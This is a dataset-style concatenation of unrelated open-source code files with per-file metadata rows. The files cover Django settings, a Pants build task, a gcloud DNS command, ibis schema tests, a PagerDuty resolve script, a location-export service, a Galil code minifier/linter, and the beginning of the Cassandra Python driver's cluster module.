'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sigma_nu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
            r'C:\Users\hightower\Desktop\Sigma Nu\SIgma-Nu-idea-1'
#need to update this when deployed
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sigma_nu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
apache-2.0
| -8,023,671,557,027,920,000
| 25.76
| 91
| 0.686398
| false
| 3.484375
| false
| false
| false
|
lahosken/pants
|
src/python/pants/core_tasks/what_changed.py
|
1
|
2061
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.base.deprecated import deprecated
from pants.scm.subsystems.changed import Changed
from pants.task.console_task import ConsoleTask
# TODO: Remove this entire file in 1.5.0dev0.
class WhatChanged(ConsoleTask):
"""Emits the targets that have been modified since a given commit."""
@classmethod
def register_options(cls, register):
super(WhatChanged, cls).register_options(register)
# N.B. The bulk of options relevant to this task now come from the `Changed` subsystem.
register('--files', type=bool, removal_version='1.5.0dev0',
help='Show changed files instead of the targets that own them.',
removal_hint='Use your scm implementation (e.g. `git diff --stat`) instead.')
@classmethod
def subsystem_dependencies(cls):
return super(WhatChanged, cls).subsystem_dependencies() + (Changed.Factory,)
@deprecated('1.5.0dev0', 'Use e.g. `./pants --changed-parent=HEAD list` instead.',
'`./pants changed`')
def console_output(self, _):
# N.B. This task shares an options scope ('changed') with the `Changed` subsystem.
options = self.get_options()
changed = Changed.Factory.global_instance().create(options)
change_calculator = changed.change_calculator(
build_graph=self.context.build_graph,
address_mapper=self.context.address_mapper,
scm=self.context.scm,
workspace=self.context.workspace,
# N.B. `exclude_target_regexp` is a global scope option registered elsewhere.
exclude_target_regexp=options.exclude_target_regexp
)
if options.files:
for f in sorted(change_calculator.changed_files()):
yield f
else:
for addr in sorted(change_calculator.changed_target_addresses()):
yield addr.spec
|
apache-2.0
| -6,841,545,234,120,318,000
| 41.061224
| 93
| 0.700631
| false
| 3.955854
| false
| false
| false
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/surface/dns/managed_zones/create.py
|
1
|
2431
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gcloud dns managed-zone create command."""
from googlecloudsdk.api_lib.dns import util
from googlecloudsdk.calliope import base
from googlecloudsdk.core import list_printer
from googlecloudsdk.core import log
class Create(base.Command):
"""Create a Cloud DNS managed-zone.
This command creates a Cloud DNS managed-zone.
"""
detailed_help = {
'DESCRIPTION': '{description}',
'EXAMPLES': """\
To create a managed-zone, run:
$ {command} my_zone --dns_name my.zone.com. --description "My zone!"
""",
}
@staticmethod
def Args(parser):
parser.add_argument('dns_zone',
metavar='ZONE_NAME',
help='Name of the managed-zone to be created.')
parser.add_argument(
'--dns-name',
required=True,
help='The DNS name suffix that will be managed with the created zone.')
parser.add_argument('--description',
required=True,
help='Short description for the managed-zone.')
@util.HandleHttpError
def Run(self, args):
dns = self.context['dns_client']
messages = self.context['dns_messages']
resources = self.context['dns_resources']
zone_ref = resources.Parse(args.dns_zone, collection='dns.managedZones')
zone = messages.ManagedZone(name=zone_ref.managedZone,
dnsName=util.AppendTrailingDot(args.dns_name),
description=args.description)
result = dns.managedZones.Create(
messages.DnsManagedZonesCreateRequest(managedZone=zone,
project=zone_ref.project))
log.CreatedResource(zone_ref)
return result
def Display(self, args, result):
list_printer.PrintResourceList('dns.managedZones', [result])
|
bsd-3-clause
| 7,825,775,985,124,091,000
| 34.231884
| 80
| 0.65364
| false
| 4.242583
| false
| false
| false
|
cpcloud/ibis
|
ibis/expr/tests/test_schema.py
|
1
|
4977
|
import ibis
from ibis.expr import datatypes as dt
def test_whole_schema():
customers = ibis.table(
[
('cid', 'int64'),
('mktsegment', 'string'),
(
'address',
(
'struct<city: string, street: string, '
'street_number: int32, zip: int16>'
),
),
('phone_numbers', 'array<string>'),
(
'orders',
"""array<struct<
oid: int64,
status: string,
totalprice: decimal(12, 2),
order_date: string,
items: array<struct<
iid: int64,
name: string,
price: decimal(12, 2),
discount_perc: decimal(12, 2),
shipdate: string
>>
>>""",
),
(
'web_visits',
(
'map<string, struct<user_agent: string, '
'client_ip: string, visit_date: string, '
'duration_ms: int32>>'
),
),
(
'support_calls',
(
'array<struct<agent_id: int64, '
'call_date: string, duration_ms: int64, '
'issue_resolved: boolean, '
'agent_comment: string>>'
),
),
],
name='customers',
)
expected = ibis.Schema.from_tuples(
[
('cid', dt.int64),
('mktsegment', dt.string),
(
'address',
dt.Struct.from_tuples(
[
('city', dt.string),
('street', dt.string),
('street_number', dt.int32),
('zip', dt.int16),
]
),
),
('phone_numbers', dt.Array(dt.string)),
(
'orders',
dt.Array(
dt.Struct.from_tuples(
[
('oid', dt.int64),
('status', dt.string),
('totalprice', dt.Decimal(12, 2)),
('order_date', dt.string),
(
'items',
dt.Array(
dt.Struct.from_tuples(
[
('iid', dt.int64),
('name', dt.string),
('price', dt.Decimal(12, 2)),
(
'discount_perc',
dt.Decimal(12, 2),
),
('shipdate', dt.string),
]
)
),
),
]
)
),
),
(
'web_visits',
dt.Map(
dt.string,
dt.Struct.from_tuples(
[
('user_agent', dt.string),
('client_ip', dt.string),
('visit_date', dt.string),
('duration_ms', dt.int32),
]
),
),
),
(
'support_calls',
dt.Array(
dt.Struct.from_tuples(
[
('agent_id', dt.int64),
('call_date', dt.string),
('duration_ms', dt.int64),
('issue_resolved', dt.boolean),
('agent_comment', dt.string),
]
)
),
),
]
)
assert customers.schema() == expected
def test_schema_subset():
s1 = ibis.schema([('a', dt.int64), ('b', dt.int32), ('c', dt.string)])
s2 = ibis.schema([('a', dt.int64), ('c', dt.string)])
assert s1 > s2
assert s2 < s1
assert s1 >= s2
assert s2 <= s1
def test_empty_schema():
schema = ibis.schema([])
result = repr(schema)
expected = """\
ibis.Schema {
}"""
assert result == expected
|
apache-2.0
| -8,713,466,511,553,539,000
| 31.960265
| 74
| 0.277275
| false
| 5.573348
| false
| false
| false
|
edunham/toys
|
pd/resolve.py
|
1
|
1132
|
#!/usr/bin/env python3
# based on example from https://github.com/PagerDuty/API_Python_Examples/tree/master/EVENTS_API_v2
import json
import requests
import os
import sys
ROUTING_KEY = os.environ['PAGERDUTY_SERVICE_KEY']
INCIDENT_KEY = sys.argv[1]
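# Usage (illustrative): PAGERDUTY_SERVICE_KEY=<routing key> ./resolve.py <dedup key of the open incident>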
def resolve_incident():
    # Resolves a PagerDuty incident using a previously generated incident (dedup) key
    # Uses Events V2 API - documentation: https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2
header = {
"Content-Type": "application/json"
}
    payload = { # Payload is built with the fewest fields required to resolve an incident
"routing_key": ROUTING_KEY,
"event_action": "resolve",
"dedup_key": INCIDENT_KEY
}
response = requests.post('https://events.pagerduty.com/v2/enqueue',
data=json.dumps(payload),
headers=header)
if response.json()["status"] == "success":
print('Incident Resolved ')
else:
print(response.text) # print error message if not successful
if __name__ == '__main__':
resolve_incident()
|
mit
| 1,053,160,661,838,398,100
| 28.789474
| 109
| 0.64576
| false
| 3.605096
| false
| false
| false
|
nditech/elections
|
apollo/locations/__init__.py
|
1
|
4175
|
from apollo.core import Service, cache
from apollo.locations.models import Sample, LocationType, Location
import unicodecsv
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
class SamplesService(Service):
__model__ = Sample
class LocationTypesService(Service):
__model__ = LocationType
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
class LocationsService(Service):
__model__ = Location
def root(self):
# a raw query is needed because querying 'normally'
# (i.e.: ancestors_ref=[]) will raise an exception
# about an invalid ObjectID
return self.find(__raw__={'ancestors_ref': []}).first()
@cache.memoize(timeout=86400)
def registered_voters_map(self):
'''
        This method computes a map of location ids to the corresponding
        number of registered voters and caches the result for a day.
'''
eligible_location_types = LocationTypesService().find(
has_registered_voters=True).scalar('name')
return {pk: rv for (pk, rv) in self.find(
location_type__in=eligible_location_types).scalar(
'pk', 'registered_voters')}
def export_list(self, queryset):
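        # Streams a CSV export: the header row (derived from the location type
        # hierarchy) is yielded first, then one encoded row per location,
        # ordered by location code.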
headers = []
location_types = list(LocationTypesService().find().order_by(
'ancestors_ref'))
for location_type in location_types:
location_name = location_type.name.upper()
headers.append('{}_N'.format(location_name))
headers.append('{}_ID'.format(location_name))
if location_type.has_political_code:
headers.append('{}_PCODE'.format(location_name))
if location_type.has_registered_voters:
headers.append('{}_RV'.format(location_name))
for metafield in location_type.metafields:
headers.append('{}_{}'.format(
location_name, metafield.upper()
))
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in headers])
yield output.getvalue()
output.close()
if queryset.count() < 1:
yield
else:
locations = queryset
locations = locations.order_by('code')
for location in locations:
record = []
for location_type in location_types:
try:
this_location = filter(
lambda l: l.location_type == location_type.name,
location.ancestors_ref
).pop()
except IndexError:
if location.location_type == location_type.name:
this_location = location
else:
this_location = None
record.append(this_location.name or ''
if this_location else '')
record.append(this_location.code or ''
if this_location else '')
if location_type.has_political_code:
record.append(this_location.political_code or ''
if this_location else '')
if location_type.has_registered_voters:
record.append(this_location.registered_voters or ''
if this_location else '')
for metafield in location_type.metafields:
record.append(getattr(this_location, metafield, '')
if this_location else '')
output = StringIO()
writer = unicodecsv.writer(output, encoding='utf-8')
writer.writerow([unicode(i) for i in record])
yield output.getvalue()
output.close()
|
gpl-3.0
| 3,217,432,549,554,864,600
| 39.144231
| 76
| 0.535329
| false
| 4.832176
| false
| false
| false
|
mehdy/click-pug
|
tehpug.py
|
1
|
2029
|
# coding: utf-8
#
# ==========================================
# Developed by Mehdy Khoshnoody =
# Contact @ mehdy.khoshnoody@gmail.com =
# More info @ http://mehdy.net =
# ==========================================
#
__author__ = 'mehdy'
import click
def version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('version 1.0')
ctx.exit()
def validate(ctx, param, value):
    if value < 18:
        click.echo('You are not authorized to attend. You must be at least 18.')
        ctx.exit()
    return value
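# click passes each parameter value through its callback, so validate() has to
# return the value for --age to reach the command function.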
@click.group()
@click.option('--version', callback=version, expose_value=False, is_flag=True, is_eager=True)
def main():
'''
    This is a detail section for the app
'''
pass
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, callback=validate, help='enter your age')
@click.option('--attend/--not-attend', default=False)
@click.argument('out', type=click.File('w'), required=False)
@click.option('--group', type=click.Choice(['flask','django','click']), default='flask')
def pug(name, age, attend, out, group):
'''
    this is a help message for pug
'''
if out:
if not attend:
click.echo('Why???', out)
click.echo('hello %s, you are %s years old.\nwelcome to PUG' %(name, age), out)
click.echo('you are member of %s subgroup in pug.' %group, out)
else:
if not attend:
click.echo('Why???')
click.echo('hello %s, you are %s years old.\nwelcome to PUG' % (name, age))
click.echo('you are member of %s subgroup in pug.' % group)
@main.command()
@click.option('--name', '-n', default='tehpug', type=click.STRING, help='enter your name')
@click.option('--age', '-a', default=15, help='enter your age')
def lug(name, age):
'''
and a help message for lug
'''
click.echo('hello %s, you are %s years old.\nwelcome to LUG' %(name, age))
|
gpl-2.0
| -5,895,680,206,538,094,000
| 31.222222
| 93
| 0.580089
| false
| 3.277868
| false
| false
| false
|
duelafn/python-galil-apci
|
galil_apci/file.py
|
1
|
15100
|
# -*- coding: utf-8 -*-
"""Simple galil file templating and minification
Preforms useful actions on galil encoder files.
- Substitution of template variables (using jinja2)
- Whitespace trimming and minification by command packing
"""
# Author: Dean Serenevy <deans@apcisystems.com>
# This software is Copyright (c) 2013 APCI, LLC.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, absolute_import, print_function
import re
import logging
logger = logging.getLogger(__name__)
import galil_apci
import jinja2
import collections
from jinja2_apci import RequireExtension, RaiseExtension
import math
axis2idx = { "A": 0, "B": 1, "C": 2, "D": 3,
"E": 4, "F": 5, "G": 6, "H": 7,
"X": 0, "Y": 1, "Z": 2, "W": 3
}
def param_list(params):
"""
    Produces a string appropriate for a Galil parameter list for a set of axes.
Setting a number of values at once sometimes requires issuing a command
with a single positional list of values for each axis. For example::
JG val1,val2,...
This can be difficult if the axis numbers are parameters. This function
will produce a list from a dictionary of axes (numerical or letters)::
JG{{ param_list({ "A": 60*4096, "B": 60*4096 }) }}
JG{{ param_list({ "0": 60*4096, "1": 60*4096 }) }}
JG{{ param_list({ primary.axis: "^a*" ~ primary.counts, secondary.axis: "^a*" ~ secondary.counts }) }}
"""
a = [""] * 8
for (k, v) in params.iteritems():
a[int(axis2idx.get(k, k))] = str(v)
i = 7
while i >= 0:
if a[i] == '':
i -= 1
else:
break
if i < 0:
raise Exception("No values in the parameter list: {}".format(str(params)))
return ",".join(a[0:i+1])
def build_commander(fmt):
"""
Convenience method which constructs list of formatted commands when
passed a list of arguments.
E.g.,::
HX = build_commander("HX{}")
print( HX(1,2,3) ) # prints HX1;HX2;HX3
"""
def cmd(*args):
return ";".join([ fmt.format(x) for x in args ])
return cmd
def sin(theta):
"""sin function taking degree arguments"""
return math.sin(math.pi * theta/180)
def asin(h):
"""asin function returning degrees"""
return 180 * math.asin(h) / math.pi
def cos(theta):
"""cos function taking degree arguments"""
return math.cos(math.pi * theta/180)
def acos(h):
"""acos function returning degrees"""
return 180 * math.acos(h) / math.pi
class GalilFile(object):
@classmethod
def add_globals(cls, g):
g["string_to_galil_hex"] = galil_apci.Galil.string_to_galil_hex
g["galil_hex_to_string"] = galil_apci.Galil.galil_hex_to_string
g["galil_hex_to_binary"] = galil_apci.Galil.galil_hex_to_binary
g["round_galil"] = galil_apci.Galil.round
g["axis2idx"] = axis2idx
g["param_list"] = param_list
g["HX"] = build_commander("HX{}")
g["SB"] = build_commander("SB{}")
g["CB"] = build_commander("CB{}")
g["max"] = max
g["min"] = min
g["int"] = int
g["sin"] = sin
g["asin"] = asin
g["cos"] = cos
g["acos"] = acos
def __init__(self, path=None, package=None, line_length=79):
"""
@param path: If a path (array of directories) is provided, it will
be prepended to the template search path. The default path is
the "gal" folder in the apci module directory.
@param line_length: Galil maximum line length. 79 for most boards,
but some are capped at 39.
"""
self.line_length = line_length
loaders = []
if path:
loaders.append(jinja2.FileSystemLoader(path, encoding='utf-8'))
if package:
loaders.append(jinja2.PackageLoader(package, 'gal', encoding='utf-8'))
def finalize(value):
if value is None:
print("Use of undefined value in template!")
return "None"
else:
return value
self.env = jinja2.Environment(
extensions=[RequireExtension, RaiseExtension],
loader=jinja2.ChoiceLoader(loaders),
undefined=jinja2.StrictUndefined,
finalize=finalize,
)
GalilFile.add_globals(self.env.globals)
def load(self, name, context):
"""Renders and minifies a template"""
return self.minify( self.render(name, context) )
def lint(self, content, warnings=False):
"""
Performs a lint check on the galil code
- long lines, too-long strings
        - duplicate labels / C{JS} or C{JP} to non-existent labels
- C{_JS} or C{()} used in sub argument, inconsistent sub arity
- Double equals ("=="), Not equals ("!=")
- presence of "None" anywhere in the code
- [warning] unused labels
NOT IMPLEMENTED / TODO:
- long variable names
- external JP targets
- C{SHA}, C{_GRB}, ... (axes outside of braces, should be C{SHE{lb}E{lb}AE{rb}E{rb}} and C{_GRE{lb}E{lb}BE{rb}E{rb}})
- uninitialized variables (variables not initialized in any #xxINIT)
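
        A minimal usage sketch (paths and template name are illustrative)::

            gf = GalilFile(path=['/path/to/gal/templates'])
            for err in gf.lint(gf.render('main.gal', {})):
                print err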
"""
content = self.minify(content)
errors = []
# WARNING: Any trailing semicolon/EOL checks need to be zero-width assertions
p_sub_def = re.compile(r"(?:^|;)(#[a-zA-Z0-9_]{1,7})")
p_sub_arg = re.compile(r"""
(?:^|;)
(?:J[SP]|XQ) (\#[a-zA-Z0-9_]{1,7}) # jump name
((?:\(.*?\))?) # optional arguments
(?= ; | $ # endl
| , \( # complex condition
| , (?:\d+|\^[a-h]|\w{1,8}) (?:;|$) # thread number
)
""", re.X)
p_bad_ops = re.compile(r"(?:==|!=)")
p_JS = re.compile(r"_JS")
p_if_js = re.compile(r"(?:^|;)IF\([^;\n]+\)[;\n](J[SP]#[a-zA-Z]+)[^;\n]*[;\n]ENDIF", re.M)
# Dangerous to have any calculation in an argument. Only want variables.
# warning: won't catch @ABS[foo]
p_danger_arg = re.compile(r"(?:.(?:\(|\)).|[^a-zA-Z0-9.,@\[\]_\(\)\^\&\"\-]|(?<![\(,])\-)")
pc_MG = re.compile(r"^MG")
subs = set()
sub_line = {}
sub_arity = {}
sub_neg1_dflt = set(("#ok", "#error"))
AUTO_subs = set(["#AUTO", "#MCTIME", "#AMPERR", "#AUTOERR", "#POSERR", "#CMDERR"])
JSP_sub = set()
JSP_line = collections.defaultdict(list)
if warnings:
for jump in p_if_js.findall(content):
errors.append( "IF(...);{} better written as {},(...)".format(jump, jump) )
lineno = 0
for line in content.split("\n"):
lineno += 1
# presence of None
if "None" in line:
errors.append( "line {}, Contains 'None', check template vars: {}".format(lineno, line) )
# long lines
if len(line) > self.line_length:
errors.append( "line {}, Line too long: {}".format(lineno, line) )
# Bad operators
if p_bad_ops.search(line):
errors.append( "line {}, bad operator: {}".format(lineno, line) )
# for duplicate labels
for name in p_sub_def.findall(line):
if name in subs:
errors.append( "line {}, Duplicate label: {}".format(lineno, name) )
else:
subs.add(name)
sub_line[name] = lineno
# examine subroutine arguments (JS, JP)
# also for unused labels and jumps to non-existant labels
for name, arg in p_sub_arg.findall(line):
# Note: arg includes "()"
JSP_sub.add(name)
JSP_line[name].append(lineno)
args = [] if len(arg) < 3 else arg.split(',')
if name in sub_neg1_dflt and arg == "(-1)":
# Make exception for #ok and #error
pass
elif name in sub_arity:
if len(args) != sub_arity[name]:
errors.append( "line {}, inconsistent sub arity for {}. Was {} now {}".format(lineno, name, sub_arity[name], len(args)) )
else:
sub_arity[name] = len(args)
if p_JS.search(arg):
errors.append( "line {}, _JS used in subroutine argument: {}".format(lineno, line) )
if p_danger_arg.search(arg):
errors.append( "line {}, Dangerous value (calculation) used in argument: {}".format(lineno, line) )
for cmd in line.split(";"):
# long strings
if not pc_MG.search(cmd):
strings = cmd.split('"')
for idx in (x for x in xrange(1, len(strings), 2) if len(strings[x]) > 5):
errors.append( "line {}, Long string '{}' in command: {}".format(lineno, strings[idx], cmd) )
# jumps to non-existant labels
for sub in JSP_sub - subs:
errors.append( "line(s) {}, J[SP]{} found but label {} not defined".format(JSP_line[sub], sub, sub) )
if warnings:
# unused labels
for sub in subs - JSP_sub - AUTO_subs:
errors.append( "line {}, Label {} defined but never used".format(sub_line[sub], sub) )
return errors
def minify(self, content):
"""
Performs minification on a galil file. Actions performed:
- Strips all comments
- trims space after semicolon and before/after various ops (" = ", "IF (...)")
- Merges "simple" lines (up to line_length)
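
        For example (hypothetical input, not from any real template)::

            #START
            'set up two variables
            a = 1
            b = a + 2
            EN

        minifies to the single line ``#START;a=1;b=a+2;EN``.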
"""
lines = []
double_semi = re.compile(r';(\s*)(?=;)')
line_end_semi = re.compile(r';$')
# Comments: ', NO, REM. Do NOT need to check for word boundaries ("NOTE" is a comment)
#
# WARNING: This is INCORRECT! In galil a semicolon ends a comment
# - this is crazy so I explicitly choose to have a comment kill
# the rest of the line
comment = re.compile(r"(?:^|;)\s*(?:'|NO|REM).*")
# Operators with wrapped space. Match will be replaced with \1.
operator_spaces = re.compile(r"\s*([,;=\+\-*/%<>\(\)\[\]&|]|<>|>=|<=)\s*")
# A line containing just a label
label_line = re.compile(r"^#[a-zA-Z0-9]{1,7}$")
# A line that starts with a label
label_start = re.compile(r"^#")
# Joinable Lines (combinations of the following):
# - Simple Assignments: assignments to our variables or arrays (names start with a lowercase letter)
# - ENDIF, ELSE
# NOTE: a joinable line never ends in a semicolon - this provides a way to force a line break
joinable_line = re.compile(r"""
^(?: (?:^|;) \s*
(?:
(?:[~^][a-z]|[a-z][a-zA-Z0-9]{0,7}(?:\[[^\];]+\])?)
\s* = \s* [^\;]+
| ENDIF
| ELSE
)
\s*)+$
""", re.X)
_lines1 = []
# Start with simple compaction (removes extra garbage and makes
# later length calculations more reliable)
for line in content.split("\n"):
line = re.sub(comment, '', line)
line = re.sub(operator_spaces, '\\1', line)
line = line.strip()
if len(line):
_lines1.append(line)
# The more advanced stuff: line merging, etc
i = 0
_lines2 = []
while i < len(_lines1):
line = _lines1[i]
while ( i < len(_lines1) - 1
and joinable_line.match(_lines1[i+1])
and self.line_length > len(line + ";" + _lines1[i+1])
):
line = line + ";" + _lines1[i+1]
i += 1
if len(line):
_lines2.append(line)
i += 1
# Squash label into next line (assuming it isn't itself a label)
i = 0
while i < len(_lines2):
line = _lines2[i]
if ( i < len(_lines2) - 1
and label_line.match(line)
and not label_start.match(_lines2[i+1])
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
if ( i < len(_lines2) - 1
and _lines2[i+1] == 'EN'
and self.line_length > len(line + ";" + _lines2[i+1])
):
line = line + ";" + _lines2[i+1]
i += 1
# double semicolons confuse galil but are somewhat easy to
# introduce when templating and doing strange minification.
# Strip them out again just to be sure:
line = line_end_semi.sub('',(double_semi.sub(r'\1',line)))
if len(line):
lines.append(line)
i += 1
for i, line in enumerate(lines):
if (len(line) > self.line_length):
logger.error("Long line '%s' in minified galil output", line)
return "\n".join(lines)
def trim(self, content):
"""
Performs whitespace trimming on a galil file.
"""
lines = []
for line in content.split("\n"):
line = line.strip()
if len(line):
lines.append(line)
return "\n".join(lines)
def render(self, name, context):
"""
Renders a galil template file (substitutes variables and expands
inclusions), but does not perform whitespace trimming or
minification.
"""
content = self.env.get_template(name).render(context)
# double semicolons confuse galil but are somewhat easy to
# introduce when templating. Strip them out here:
return re.sub(r';(\s*)(?=;)', r'\1', content).encode('utf-8')
def get_template(self, name):
"""
Gets the jinja template object for a template file.
"""
return self.env.get_template(name)
|
lgpl-3.0
| 4,899,683,945,039,046,000
| 34.6974
| 145
| 0.515762
| false
| 3.747828
| false
| false
| false
|
kishkaru/python-driver
|
cassandra/cluster.py
|
1
|
149094
|
# Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module houses the main classes you will interact with,
:class:`.Cluster` and :class:`.Session`.
"""
from __future__ import absolute_import
import atexit
from collections import defaultdict, Mapping
from concurrent.futures import ThreadPoolExecutor
import logging
from random import random
import socket
import sys
import time
from threading import Lock, RLock, Thread, Event
import six
from six.moves import range
from six.moves import queue as Queue
import weakref
from weakref import WeakValueDictionary
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # NOQA
from functools import partial, wraps
from itertools import groupby, count
from cassandra import (ConsistencyLevel, AuthenticationFailed,
OperationTimedOut, UnsupportedOperation,
SchemaTargetType, DriverException)
from cassandra.connection import (ConnectionException, ConnectionShutdown,
ConnectionHeartbeat, ProtocolVersionUnsupported)
from cassandra.cqltypes import UserType
from cassandra.encoder import Encoder
from cassandra.protocol import (QueryMessage, ResultMessage,
ErrorMessage, ReadTimeoutErrorMessage,
WriteTimeoutErrorMessage,
UnavailableErrorMessage,
OverloadedErrorMessage,
PrepareMessage, ExecuteMessage,
PreparedQueryNotFound,
IsBootstrappingErrorMessage,
BatchMessage, RESULT_KIND_PREPARED,
RESULT_KIND_SET_KEYSPACE, RESULT_KIND_ROWS,
RESULT_KIND_SCHEMA_CHANGE, MIN_SUPPORTED_VERSION,
ProtocolHandler)
from cassandra.metadata import Metadata, protect_name, murmur3
from cassandra.policies import (TokenAwarePolicy, DCAwareRoundRobinPolicy, SimpleConvictionPolicy,
ExponentialReconnectionPolicy, HostDistance,
RetryPolicy, IdentityTranslator)
from cassandra.pool import (Host, _ReconnectionHandler, _HostReconnectionHandler,
HostConnectionPool, HostConnection,
NoConnectionsAvailable)
from cassandra.query import (SimpleStatement, PreparedStatement, BoundStatement,
BatchStatement, bind_params, QueryTrace,
named_tuple_factory, dict_factory, tuple_factory, FETCH_SIZE_UNSET)
def _is_eventlet_monkey_patched():
if 'eventlet.patcher' not in sys.modules:
return False
import eventlet.patcher
return eventlet.patcher.is_monkey_patched('socket')
def _is_gevent_monkey_patched():
if 'gevent.monkey' not in sys.modules:
return False
import gevent.socket
return socket.socket is gevent.socket.socket
# default to gevent when we are monkey patched with gevent, eventlet when
# monkey patched with eventlet, otherwise if libev is available, use that as
# the default because it's fastest. Otherwise, use asyncore.
if _is_gevent_monkey_patched():
from cassandra.io.geventreactor import GeventConnection as DefaultConnection
elif _is_eventlet_monkey_patched():
from cassandra.io.eventletreactor import EventletConnection as DefaultConnection
else:
try:
from cassandra.io.libevreactor import LibevConnection as DefaultConnection # NOQA
except ImportError:
from cassandra.io.asyncorereactor import AsyncoreConnection as DefaultConnection # NOQA
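# A hedged sketch of overriding the reactor selection above: instead of relying
# on the default chosen here, a specific connection class can be passed to
# Cluster (contact point is a placeholder):
#
#   from cassandra.cluster import Cluster
#   from cassandra.io.asyncorereactor import AsyncoreConnection
#   cluster = Cluster(['127.0.0.1'], connection_class=AsyncoreConnection)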
# Forces load of utf8 encoding module to avoid deadlock that occurs
# if code that is being imported tries to import the module in a separate
# thread.
# See http://bugs.python.org/issue10923
"".encode('utf8')
log = logging.getLogger(__name__)
DEFAULT_MIN_REQUESTS = 5
DEFAULT_MAX_REQUESTS = 100
DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST = 2
DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST = 8
DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST = 1
DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST = 2
_NOT_SET = object()
class NoHostAvailable(Exception):
"""
Raised when an operation is attempted but all connections are
busy, defunct, closed, or resulted in errors when used.
"""
errors = None
"""
A map of the form ``{ip: exception}`` which details the particular
Exception that was caught for each host the operation was attempted
against.
"""
def __init__(self, message, errors):
Exception.__init__(self, message, errors)
self.errors = errors
def _future_completed(future):
""" Helper for run_in_executor() """
exc = future.exception()
if exc:
log.debug("Failed to run task on executor", exc_info=exc)
def run_in_executor(f):
"""
A decorator to run the given method in the ThreadPoolExecutor.
"""
@wraps(f)
def new_f(self, *args, **kwargs):
if self.is_shutdown:
return
try:
future = self.executor.submit(f, self, *args, **kwargs)
future.add_done_callback(_future_completed)
except Exception:
log.exception("Failed to submit task to executor")
return new_f
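# Usage sketch for the decorator above (hypothetical class; anything using it
# is expected to expose `executor` and `is_shutdown`, as Cluster does below):
#
#   class Worker(object):
#       is_shutdown = False
#       executor = ThreadPoolExecutor(max_workers=1)
#
#       @run_in_executor
#       def refresh(self):
#           log.debug("running on the executor thread")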
_clusters_for_shutdown = set()
def _register_cluster_shutdown(cluster):
_clusters_for_shutdown.add(cluster)
def _discard_cluster_shutdown(cluster):
_clusters_for_shutdown.discard(cluster)
def _shutdown_clusters():
clusters = _clusters_for_shutdown.copy()  # copy because shutdown() modifies the global set via discard()
for cluster in clusters:
cluster.shutdown()
atexit.register(_shutdown_clusters)
# murmur3 implementation required for TokenAware is only available for CPython
import platform
if platform.python_implementation() == 'CPython':
def default_lbp_factory():
if murmur3 is not None:
return TokenAwarePolicy(DCAwareRoundRobinPolicy())
return DCAwareRoundRobinPolicy()
else:
def default_lbp_factory():
